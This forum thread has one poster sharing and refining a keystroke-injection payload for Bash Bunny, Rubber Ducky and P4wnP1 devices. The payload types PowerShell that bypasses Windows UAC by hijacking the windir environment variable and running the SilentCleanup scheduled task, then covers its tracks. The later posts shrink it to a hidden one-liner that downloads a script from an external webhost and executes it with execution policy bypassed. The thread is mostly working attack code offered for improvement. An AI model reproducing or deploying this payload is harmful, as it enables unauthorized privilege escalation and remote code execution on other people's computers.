KryptoKat Posted March 18, 2019 Posted March 18, 2019 In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1" Q ENTER Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q .\\uac.ps1 Q ENTER Q rmdir uac.ps1 Q ENTER Q Set-ExecutionPolicy Undefined -Scope CurrentUser Q ENTER Q DELAY 500 Q a Q ENTER Q exit Q ENTER P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
KryptoKat Posted March 19, 2019 Author Posted March 19, 2019 ---UPDATE--- I've Simplified the script to powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; However I'm having trouble running the file in the same line, any help would be greatly appreciated
KryptoKat Posted March 20, 2019 Author Posted March 20, 2019 ---UPDATE--- I finally got the PowerShell script functioning, in theory, this should work on any account because everyone has access to C:\Windows\Temp powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1 Now to find something useful to do with this
Recommended Posts
Archived
This topic is now archived and is closed to further replies.